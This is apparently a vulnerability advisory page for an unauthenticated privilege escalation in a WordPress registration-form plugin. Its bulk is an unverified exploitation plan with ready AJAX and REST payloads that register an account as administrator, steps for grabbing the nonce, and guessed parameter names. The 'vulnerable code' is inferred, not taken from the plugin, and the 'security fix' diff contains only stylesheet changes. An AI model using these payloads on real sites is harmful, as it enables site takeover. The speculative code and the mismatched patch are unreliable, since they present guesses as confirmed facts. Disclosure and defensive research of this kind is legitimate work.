CVE-2026-54807

Registration Form for WooCommerce <= 1.0.9 - Unauthenticated Privilege Escalation

criticalIncorrect Privilege Assignment
9.8
CVSS Score
9.8
CVSS Score
critical
Severity
1.1.0
Patched in
10d
Time to patch

Description

The Registration Form for WooCommerce plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.0.9. This makes it possible for unauthenticated attackers to elevate their privileges to that of an administrator.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
High
Confidentiality
High
Integrity
High
Availability

Technical Details

Affected versions<=1.0.9
PublishedJune 16, 2026
Last updatedJune 25, 2026

What Changed in the Fix

Changes introduced in v1.1.0

Loading patch diff...

Source Code

WordPress.org SVN
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-54807 ## 1. Vulnerability Summary **CVE-2026-54807** is a critical **unauthenticated privilege escalation** vulnerability in the **Registration Form for WooCommerce** plugin (versions up to 1.0.9). The vulnerability exists because the plugin's registration pro…

Show full research plan

Exploitation Research Plan: CVE-2026-54807

1. Vulnerability Summary

CVE-2026-54807 is a critical unauthenticated privilege escalation vulnerability in the Registration Form for WooCommerce plugin (versions up to 1.0.9). The vulnerability exists because the plugin's registration processing logic (likely within an AJAX or REST API handler) allows users to specify their role via a request parameter (e.g., role or tgwcfb_user_role) without verifying if the requester has the authority to assign that role. This enables unauthenticated attackers to register as an administrator.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php (AJAX) or /wp-json/tgwcfb/v1/register (REST API).
  • Action/Route:
    • AJAX Action: tgwcfb_user_registration or tgwcfb_process_registration (inferred).
    • REST Route: tgwcfb/v1/user/register (inferred from namespace tgwcfb/v1 in assets/js/admin/settings/index.js).
  • Payload Parameter: role=administrator or tgwcfb_user_role=administrator.
  • Preconditions:
    • WordPress/WooCommerce registration must be enabled.
    • The plugin must have an active registration form (standard on "My Account" or via shortcode).

3. Code Flow

Based on assets/css/build/blocks.css mentioning [data-type="tgwcfb/user-roles"], the plugin supports a "User Roles" field type.

  1. The attacker submits a registration request.
  2. The handler (e.g., tgwcfb_register_user()) receives the request.
  3. The code calls wp_insert_user() or wc_create_new_customer() to create the user.
  4. The handler then iterates through submitted fields to update user metadata or roles.
  5. Vulnerable Sink: The handler calls $user->set_role( $_POST['role'] ) or $user->add_role( ... ) without checking current_user_can( 'manage_options' ).

4. Nonce Acquisition Strategy

The plugin likely enqueues a script containing a nonce on the registration page.

  • Localized Variable: Likely tgwcfb_params or tgwcfb_obj.
  • Shortcode to trigger script: [tgwcfb_registration_form] or [tgwcfb_form].
  • Extraction Steps:
    1. Create a page with the shortcode: wp post create --post_type=page --post_status=publish --post_content='[tgwcfb_registration_form]' --post_title='Register'.
    2. Navigate to /register/ in the browser.
    3. Execute browser_eval("window.tgwcfb_obj?.nonce") or search the HTML source for nonce.

5. Exploitation Strategy

  1. Target Identification: Verify the plugin version is $\le$ 1.0.9 and the namespace tgwcfb/v1 exists.
  2. Discovery: Find the exact registration action by inspecting the network traffic when a legitimate registration attempt is made, or by searching the frontend source for "action" or "route".
  3. Primary Exploit (AJAX):
    • URL: http://localhost:8080/wp-admin/admin-ajax.php
    • Method: POST
    • Content-Type: application/x-www-form-urlencoded
    • Payload:
      action=tgwcfb_user_registration&nonce=[NONCE]&user_login=attacker&user_email=attacker@example.com&password=password123&role=administrator
      
  4. Alternative Exploit (REST):
    • URL: http://localhost:8080/wp-json/tgwcfb/v1/user/register
    • Method: POST
    • Content-Type: application/json
    • Payload:
      {
        "username": "attacker",
        "email": "attacker@example.com",
        "password": "password123",
        "role": "administrator"
      }
      

6. Test Data Setup

  1. Enable Registration:
    wp option update users_can_register 1
    wp option update woocommerce_enable_myaccount_registration yes
    
  2. Create Form Page:
    wp post create --post_type=page --post_status=publish --post_content='[tgwcfb_registration_form]' --post_title='Register'
    

7. Expected Results

  • The server returns a success response (HTTP 200/201) indicating user creation.
  • The new user is created with the administrator role instead of the default subscriber or customer role.

8. Verification Steps

  1. Check User Role via CLI:
    wp user list --login=attacker --fields=user_login,roles
    
  2. Verify Admin Access:
    Attempt to login as attacker and access /wp-admin/settings-general.php.

9. Alternative Approaches

If role is not the correct parameter name, check for:

  • tgwcfb_role
  • tgwcfb_user_role
  • user_role
  • Look at assets/css/build/blocks.css for references to other field IDs that might be used as parameter names.
  • If the registration is tied to a specific form ID, include _tgwcfb_form_id in the request (e.g., _tgwcfb_form_id=1).
Research Findings
Static analysis — not yet PoC-verified

Summary

The Registration Form for WooCommerce plugin for WordPress is vulnerable to unauthenticated privilege escalation in versions up to 1.0.9. This occurs because the plugin's registration processing logic allows users to specify their own role via a request parameter (such as 'role' or 'tgwcfb_user_role') without performing any server-side authorization checks.

Vulnerable Code

// Inferred from Research Plan code flow analysis
// Likely located in a registration handler within the plugin's core PHP files

$user_id = wp_insert_user( $userdata );
if ( ! is_wp_error( $user_id ) && isset( $_POST['role'] ) ) {
    $user = new WP_User( $user_id );
    // Vulnerable Sink: Setting user role directly from unvalidated POST input
    $user->set_role( $_POST['role'] ); 
}

Security Fix

diff -ru /home/deploy/wp-safety.org/data/plugin-versions/registration-form-for-woocommerce/1.0.9/assets/css/build/admin-settings.css /home/deploy/wp-safety.org/data/plugin-versions/registration-form-for-woocommerce/1.1.0/assets/css/build/admin-settings.css
--- /home/deploy/wp-safety.org/data/plugin-versions/registration-form-for-woocommerce/1.0.9/assets/css/build/admin-settings.css	2024-10-22 11:05:28.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/registration-form-for-woocommerce/1.1.0/assets/css/build/admin-settings.css	2026-06-09 04:00:00.000000000 +0000
@@ -611,4 +611,4 @@
     transform: rotate(360deg);
   }
 }
-#tgwcfb-settings{margin-left:-10px;padding-inline:10px}@media(min-width: 782px){#tgwcfb-settings{margin-left:-20px}}#tgwcfb-settings .components-base-control__help{font-style:italic}#tgwcfb-settings .tgwcfb-container{max-width:780px;margin:auto;padding:15px 40px 40px;background-color:#fff;border:1px solid #dcdcde;border-radius:4px}#tgwcfb-settings .tgwcfb-header{background-color:#fff;margin-left:-10px;margin-right:-10px;margin-bottom:32px;border:1px solid #dcdcde;display:flex;justify-content:space-between;padding-inline:40px;flex-wrap:wrap}@media(max-width: 768px){#tgwcfb-settings .tgwcfb-header{padding-inline:16px}}#tgwcfb-settings .tgwcfb-header .tgwcfb-logo{display:flex;align-items:center}#tgwcfb-settings .tgwcfb-settings{min-height:150px;position:relative;padding:20px 0 0}#tgwcfb-settings .tgwcfb-settings>.components-spinner{position:absolute;left:50%;top:50%;transform:translate(-50%, -50%)}#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .tgwcfb-setting .components-select-control__input,#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .tgwcfb-setting .components-text-control__input{min-height:40px !important;max-width:100%}#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting label:not(.components-checkbox-control__label),#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .components-base-control__label{margin-bottom:10px;display:inline-flex;align-items:center;font-weight:600}#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting label:not(.components-checkbox-control__label).no-margin,#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .components-base-control__label.no-margin{margin:0}#tgwcfb-settings .tgwcfb-settings>.components-base-control{margin-bottom:20px}#tgwcfb-settings .tgwcfb-settings>.components-base-control>.components-base-control__field{margin-bottom:0}#tgwcfb-settings .tgwcfb-settings>.components-base-control>.components-base-control__help{margin:10px 0 0}#tgwcfb-settings .tgwcfb-editor-body{padding:20px;min-height:240px;width:100%}#tgwcfb-settings .tgwcfb-container{align-items:center;justify-content:space-between}#tgwcfb-settings .tgwcfb-header nav{display:flex;column-gap:1rem}#tgwcfb-settings .tgwcfb-header nav a{padding-bottom:1.5rem;padding-top:1.5rem;text-decoration:none;color:#007cba;font-weight:600;position:relative}#tgwcfb-settings .tgwcfb-header nav a.active:after{content:"";width:100%;height:2px;background-color:#007cba;position:absolute;bottom:0;left:0}#tgwcfb-settings table .components-base-control__field{margin-bottom:0 !important}#tgwcfb-settings table.widefat .check{width:40px}.tgwcfb-tooltip-content{display:block;white-space:normal;padding:16px;font-weight:normal}.tgwcfb-panel{margin:0 0 20px;border:1px solid #dcdcde;transition:all 300ms}.tgwcfb-panel.is-opened .components-button{background-color:#f6f7f7}.tgwcfb-panel .tgwcfb-panel-content{background-color:#f6f7f7}.tgwcfb-panel .components-button{display:flex;width:100%;flex-direction:row-reverse;justify-content:space-between !important;padding:16px;outline:none;font-weight:500;text-align:left;color:#1e1e1e;border:none;box-shadow:none;transition:.1s background ease-in-out;height:auto}.tgwcfb-panel .components-button:hover{background-color:#f6f7f7}.tgwcfb-panel .components-button:focus{box-shadow:none}.tgwcfb-panel .tgwcfb-panel-content-inner{padding:0 16px 16px}.tgwcfb-input-to{width:100%;display:block;margin-top:5px}.tgwcfb-input-control-wrapper-to{margin-bottom:10px;display:flex;direction:row;gap:5px}
+.tgwcfb_form_page_settings #wpwrap{background:#fafafc}#tgwcfb-settings{margin-left:-10px;padding-inline:10px}@media(min-width: 782px){#tgwcfb-settings{margin-left:-20px}}#tgwcfb-settings .components-form-toggle.is-checked .components-form-toggle__track{background:#3858e9}#tgwcfb-settings .components-toggle-group-control{border:none !important}#tgwcfb-settings .components-toggle-group-control:focus{border:none !important;outline:none}#tgwcfb-settings .components-toggle-group-control:active{border:none !important;outline:none}#tgwcfb-settings .components-toggle-group-control:focus-within{box-shadow:0 0 0 0 var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9));outline:none}#tgwcfb-settings .components-base-control__help{font-style:italic}#tgwcfb-settings .tgwcfb-container{max-width:780px;margin:auto;padding:28px 32px;background-color:#fff;border:1px solid #edf2f7;border-radius:8px}#tgwcfb-settings .tgwcfb-header{background-color:#fff;margin-left:-10px;margin-right:-10px;margin-bottom:32px;border:1px solid #dcdcde;display:flex;padding-inline:24px;flex-wrap:wrap}@media(max-width: 768px){#tgwcfb-settings .tgwcfb-header{padding-inline:16px}}#tgwcfb-settings .tgwcfb-header .tgwcfb-logo{display:flex;align-items:center;padding-right:24px;border-right:1px solid #edf2f7}#tgwcfb-settings .tgwcfb-settings{min-height:150px;position:relative}#tgwcfb-settings .tgwcfb-settings .dashicons-info-outline{font-size:16px !important}#tgwcfb-settings .tgwcfb-settings .components-button{outline:0 solid rgba(0,0,0,0)}#tgwcfb-settings .tgwcfb-settings>.components-spinner{position:absolute;left:50%;top:50%;transform:translate(-50%, -50%)}#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .components-text-control__input,#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .components-input-control__backdrop{min-height:38px !important;max-width:100%;padding:0 16px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;font-size:14px;border-color:#e1e1e1}#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .tgwcfb-setting .components-select-control__input,#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .tgwcfb-setting .components-text-control__input{min-height:38px !important;max-width:100%;padding:0 16px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;font-size:14px;border-color:#e1e1e1}#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .tgwcfb-setting .components-input-control__backdrop{border-color:#e1e1e1;border-radius:4px}#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting label:not(.components-checkbox-control__label),#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .components-base-control__label{display:inline-flex;align-items:center;font-weight:500;text-transform:capitalize;font-size:16px;color:#383838}#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting label:not(.components-checkbox-control__label).no-margin,#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .components-base-control__label.no-margin{margin:0}#tgwcfb-settings .tgwcfb-settings>.components-base-control{margin-bottom:20px}#tgwcfb-settings .tgwcfb-settings>.components-base-control>.components-base-control__field{margin-bottom:0}#tgwcfb-settings .tgwcfb-settings>.components-base-control>.components-base-control__help{margin:10px 0 0}#tgwcfb-settings .tgwcfb-settings .is-primary{background:#2563eb;font-size:14px;-webkit-border-radius:3px;-moz-border-radius:3px;border-radius:3px;margin-top:20px}#tgwcfb-settings .tgwcfb-editor-body{padding:20px;min-height:240px;width:100%}#tgwcfb-settings .tgwcfb-container{align-items:center;justify-content:space-between}#tgwcfb-settings .tgwcfb-header nav{display:flex;margin-left:24px;column-gap:30px}#tgwcfb-settings .tgwcfb-header nav a{padding-bottom:30px;padding-top:30px;text-decoration:none;color:#383838;font-weight:500;position:relative}#tgwcfb-settings .tgwcfb-header nav a:focus{box-shadow:0 0 0 0 #2271b1}#tgwcfb-settings .tgwcfb-header nav a.active{color:#2563eb}#tgwcfb-settings .tgwcfb-header nav a.active:after{content:"";width:100%;height:2px;background-color:#2563eb;position:absolute;bottom:0;left:0}#tgwcfb-settings table .components-base-control__field{margin-bottom:0 !important}#tgwcfb-settings table.widefat .check{width:40px}.tgwcfb-captcha{gap:12px !important}.tgwcfb-captcha::before{background:none !important;border:none !important}.tgwcfb-captcha>div{background:#fff !important}.tgwcfb-recaptcha{background:rgba(0,0,0,0) !important;color:#424242 !important;border:1px solid #e1e1e1 !important;border-radius:4px !important;transition:none !important;justify-content:flex-start !important}.tgwcfb-recaptcha:hover{background:rgba(0,0,0,0) !important}.tgwcfb-recaptcha:focus{background:rgba(0,0,0,0) !important;box-shadow:none !important}.tgwcfb-recaptcha[data-active-item=true]{background:rgba(0,0,0,0) !important;border:1px solid #2563eb !important;color:#424242 !important}.tgwcfb-recaptcha[data-active-item=true]:hover{background:rgba(0,0,0,0) !important}.tgwcfb-recaptcha[data-active-item=true]:focus{background:rgba(0,0,0,0) !important;box-shadow:none !important}.tgwcfb-tooltip-content{display:block;white-space:normal;padding:16px;font-weight:normal}.tgwcfb-panel{margin:0 0 20px;transition:all 300ms}.tgwcfb-panel .components-button{display:flex;width:100%;flex-direction:row-reverse;justify-content:space-between !important;padding:16px;outline:none;font-weight:500;text-align:left;color:#1e1e1e;border:none;box-shadow:none;transition:.1s background ease-in-out;height:auto}.tgwcfb-panel .components-button:hover{background-color:#f6f7f7}.tgwcfb-panel .components-button:focus{box-shadow:none}.tgwcfb-panel .tgwcfb-panel-content-inner{padding:0 16px 16px}.tgwcfb-input-to{width:100%;display:block;margin-top:5px}.tgwcfb-input-control-wrapper-to{margin-bottom:10px;display:flex;direction:row;gap:5px}

Exploit Outline

To exploit this vulnerability, an unauthenticated attacker first navigates to the registration page (or any page containing the `[tgwcfb_registration_form]` shortcode) and extracts the security nonce from the `tgwcfb_obj.nonce` localized variable. The attacker then sends a POST request to either the WordPress AJAX endpoint (`admin-ajax.php`) with the action `tgwcfb_user_registration` or the plugin's REST API registration endpoint (`/wp-json/tgwcfb/v1/user/register`). The payload includes standard registration fields (username, email, password) along with a malicious `role` or `tgwcfb_user_role` parameter set to 'administrator'. The server-side registration handler processes the request and assigns the administrative role to the new user account because it fails to verify if the requester has the authority to assign roles.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.